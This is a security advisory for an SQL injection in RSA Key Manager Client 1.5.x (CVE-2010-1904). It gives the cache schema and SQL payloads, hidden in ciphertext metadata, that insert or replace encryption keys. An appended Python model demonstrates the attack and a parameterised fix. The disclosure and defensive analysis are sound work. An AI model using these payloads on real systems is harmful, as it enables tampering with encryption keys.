RSA Key Manager SQL Injection Vulnerability (CVE-2010-1904)

Board: Bugtraq    Posted: 2010/06/05 02:01
Product: RSA Key Manager
Vendor: EMC/RSA
Vulnerable Component: Key Manager Client
Vulnerable Component Version: 1.5.x
Vulnerability Type: SQL injection
Vendor Contact Date: 4/20/2010
Status: Vendor does not want to fix the vulnerability.

Vulnerability Details:

RSA Key Manager Client software uses an SQLite database to cache its encryption keys. The software fails to properly validate the metadata embedded inside the RSA Key Manager encrypted data when it performs a key lookup while decrypting that data. An attacker can inject SQL commands into the metadata section of the RSA Key Manager encrypted data, and the Key Manager Client software will execute them. For example, an attacker can inject SQL statements to modify existing encryption keys, remove existing encryption keys, add new encryption keys, etc.

The Key Manager client uses two types of cache: memory cache and file cache. As long as either cache is enabled the problem can be triggered easily.

RSA Key Manager Client 1.5.x uses the following format when it encrypts data:

Field 1 = KeyIdString
Field 2 = NULL Terminator
Field 3 = Encryption IV
Field 4 = Encrypted Data

Encryption Key Cache tables:

1. "ClassTable" [contains encryption key classes configured on the server]
   classID      VARCHAR(255) PRIMARY KEY
   keyID        VARCHAR(255)   [current key id for this key class]
   refreshTime  INT UNSIGNED
   updateTime   INT UNSIGNED

2. "ConfigTable" [includes kekhash - KEK, Key Encryption Key, hash]
   name   VARCHAR(255) PRIMARY KEY
   value  VARCHAR(255)

3. "KeyTable" [holds the cached encryption keys]
   keyID        VARCHAR(255) PRIMARY KEY
   classID      VARCHAR(255)
   keyData      BLOB
   algorithm    VARCHAR(255)   [usually "AES/CBC"]
   refreshTime  INT UNSIGNED
   updateTime   INT UNSIGNED

Sample Injections:

Injecting the following SQL code (as the KeyIdString of the data being decrypted) results in a new encryption key in the Key Manager (client):

"; INSERT INTO KeyTable VALUES('1111','MyClass','MyKeyData','ABC',1000,2000);--

Injecting something like the SQL code below can be used to replace the encryption keys used by Key Manager:

"; UPDATE KeyTable SET keyData ='NewKeyData' WHERE classID='MyClass';--
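The following Python model is an added illustration of the lookup path the advisory describes; it is not the advisory's code and not RSA's. It builds the three cache tables listed above, assembles ciphertext blobs in the Field 1..4 layout, and shows a vulnerable lookup that pastes the KeyIdString into SQL text next to a hardened one that allow-lists the ID and binds it as a parameter. Everything not stated in the advisory is an assumption: that the client wraps the KeyIdString in single quotes (the advisory's payloads use a double quote, so they are rewritten with a single quote here), a 16-byte IV, that the query runs through an sqlite3_exec-style API that executes stacked statements (emulated by run_stacked), the KEY_ID_RE allow-list, and the sample rows and blobs, which are constructed.

```python
"""Model of the CVE-2010-1904 key-cache lookup (added example, not RSA's code).

Assumptions not stated in the advisory: single-quoted KeyIdString, 16-byte IV,
sqlite3_exec-style stacked execution (run_stacked), and the KEY_ID_RE allow-list.
"""
import re
import sqlite3

NUL = b"\x00"
IV_LEN = 16                                         # assumption: AES block size
KEY_ID_RE = re.compile(r"[A-Za-z0-9_.:-]{1,255}")   # assumed allow-list for key IDs

# Tables exactly as listed in the advisory, plus one constructed legitimate key.
SCHEMA = """
CREATE TABLE ClassTable (classID VARCHAR(255) PRIMARY KEY, keyID VARCHAR(255),
                         refreshTime INT UNSIGNED, updateTime INT UNSIGNED);
CREATE TABLE ConfigTable (name VARCHAR(255) PRIMARY KEY, value VARCHAR(255));
CREATE TABLE KeyTable (keyID VARCHAR(255) PRIMARY KEY, classID VARCHAR(255),
                       keyData BLOB, algorithm VARCHAR(255),
                       refreshTime INT UNSIGNED, updateTime INT UNSIGNED);
INSERT INTO ClassTable VALUES ('MyClass', 'k-0001', 1000, 2000);
INSERT INTO KeyTable VALUES ('k-0001', 'MyClass', X'00112233', 'AES/CBC', 1000, 2000);
"""


def build_cache() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def make_blob(key_id: str, iv: bytes, ciphertext: bytes) -> bytes:
    """Assemble Field 1..4: KeyIdString, NUL, IV, encrypted data."""
    return key_id.encode("latin-1") + NUL + iv + ciphertext


def parse_blob(blob: bytes):
    """Split a blob back into (KeyIdString, IV, encrypted data)."""
    key_id, _, rest = blob.partition(NUL)
    return key_id.decode("latin-1"), rest[:IV_LEN], rest[IV_LEN:]


def run_stacked(conn, sql):
    """Execute every ';'-terminated statement in sql, like sqlite3_exec().

    Python's execute() refuses stacked statements, so cut the text at statement
    boundaries (complete_statement() ignores ';' inside string literals) and
    collect the rows of each. A trailing '--' comment never forms a complete
    statement and is dropped, as SQLite itself would do.
    """
    rows = []
    while sql.strip():
        end = next((i for i, c in enumerate(sql)
                    if c == ";" and sqlite3.complete_statement(sql[:i + 1])), None)
        if end is None:
            break
        rows.extend(conn.execute(sql[:end + 1]).fetchall())
        sql = sql[end + 1:]
    return rows


def lookup_key_vulnerable(conn, blob):
    """The flaw: attacker-controlled metadata is pasted into the SQL text."""
    key_id, _iv, _ct = parse_blob(blob)
    sql = "SELECT keyData FROM KeyTable WHERE keyID = '%s';" % key_id
    rows = run_stacked(conn, sql)
    return rows[0][0] if rows else None


def lookup_key_hardened(conn, blob):
    """Fix: validate the metadata against an allow-list, then bind it."""
    key_id, _iv, _ct = parse_blob(blob)
    if not KEY_ID_RE.fullmatch(key_id):
        raise ValueError("KeyIdString in ciphertext metadata is malformed")
    row = conn.execute("SELECT keyData FROM KeyTable WHERE keyID = ?", (key_id,)).fetchone()
    return row[0] if row else None


def key_ids(conn):
    return [r[0] for r in conn.execute("SELECT keyID FROM KeyTable ORDER BY keyID")]


# Constructed ciphertexts: one genuine, two carrying the advisory's payloads
# rewritten to close a single-quoted literal instead of a double-quoted one.
IV, CT = b"\x11" * IV_LEN, b"\xaa" * 32
LEGIT = make_blob("k-0001", IV, CT)
ADD_KEY = make_blob("'; INSERT INTO KeyTable VALUES('1111','MyClass','MyKeyData','ABC',1000,2000);--", IV, CT)
SWAP_KEY = make_blob("'; UPDATE KeyTable SET keyData ='NewKeyData' WHERE classID='MyClass';--", IV, CT)


def demo():
    """Vulnerable client: decrypting hostile data rewrites the key cache.
    Hardened client: the same data is rejected before any SQL runs."""
    vuln = build_cache()
    before = lookup_key_vulnerable(vuln, LEGIT)      # genuine key bytes
    lookup_key_vulnerable(vuln, ADD_KEY)             # attacker adds key '1111'
    lookup_key_vulnerable(vuln, SWAP_KEY)            # attacker replaces every MyClass key
    after = lookup_key_vulnerable(vuln, LEGIT)       # now attacker-chosen key material

    safe = build_cache()
    try:
        lookup_key_hardened(safe, ADD_KEY)
        blocked = False
    except ValueError:
        blocked = True
    return {
        "legit_key_before": before,
        "vuln_key_ids": key_ids(vuln),
        "legit_key_after": after,
        "hardened_rejects_payload": blocked,
        "hardened_key_ids": key_ids(safe),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The point the model makes concrete is that the trigger is a decrypt, not a privileged operation: whoever can hand the client a ciphertext blob controls Field 1, and with the cache enabled the SELECT that resolves the key ID becomes the injection sink. Binding the ID as a parameter closes the injection; the allow-list additionally rejects the blob before it reaches the database, which is the behaviour a key-handling client should have for metadata it did not generate itself.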
Article code (AID): #1C2JzVgN (Bugtraq)